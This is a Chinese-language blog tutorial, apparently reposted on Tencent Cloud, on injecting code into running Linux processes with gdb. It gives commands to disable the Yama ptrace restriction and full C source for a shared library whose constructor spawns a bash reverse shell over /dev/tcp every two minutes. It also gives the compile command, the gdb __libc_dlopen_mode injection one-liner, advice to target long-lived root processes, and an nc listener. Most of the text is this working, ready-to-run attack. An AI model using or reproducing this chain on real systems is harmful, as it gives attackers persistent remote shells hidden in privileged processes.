使用gdb注入进程
注入步骤
(1)linux 中的Yama模块会禁用ptrace-based代码注入,需要将其关闭
echo 0 > /proc/sys/kernel/yama/ptrace_scope # 允许任何进程注入代码到相同用户启动的进程中,root用户可以注入所有进程
echo 2 > /proc/sys/kernel/yama/ptrace_scope # 只允许root用户注入代码以上命令需要root用户来执行,所以方式可以作为一种思路,实战中有限制。
(2) 要注入的代码callback.c:
#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>
#define SLEEP 120 /* Time to sleep between callbacks */
#define CBADDR "127.0.0.1" /* Callback address */
#define CBPORT "4444" /* Callback port */
/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash" //进行反向shell
void *callback(void *a);
__attribute__((constructor)) /* Run this function on library load */
// 在动态库加载之后运行该函数
void start_callbacks(){
pthread_t tid;
pthread_attr_t attr;
/* Start thread detached */
if (-1 == pthread_attr_init(&attr)) {
return;
}
if (-1 == pthread_attr_setdetachstate(&attr,
PTHREAD_CREATE_DETACHED)) {
return;
}
/* Spawn a thread to do the real work */
pthread_create(&tid, &attr, callback, NULL); //创建线程
}
/* callback tries to spawn a reverse shell every so often. */
void *
callback(void *a)
{
for (;;) {
/* Try to spawn a reverse shell */
system(CMD);
/* Wait until next shell */
sleep(SLEEP);
}
return NULL;
}编译成动态链接库:
cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared(3)切换到root用户,列出root用户进程
ps -fxo pid,user,args | egrep -v ' \[\S+\]$'选择想要注入的进程pid,使用gdb进行注入,这里选择pids值较低的,因为值越低代表运行的时间越早,选择长期运行的进程,因为这些进程不容易被kill。
echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p pid用gdb打开进程,并且用__libc_dlopen_mode打开要注入的动态链接库。使用GDB的print命令,以方便取函数的返回值。将它回显到GDB的标准输入中,它会引起GDB退出,就省得使用quit命令了。
(4)开启另外的终端,监听本地的4444端口
nc -nvl 4444 注入效果
这种攻击方式容易被检测,会有落地文件,内存中也可以查看出来,但是可以作为一种攻击思路学习。
参考链接
https://magisterquis.github.io/2018/03/11/process-injection-with-gdb.html
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录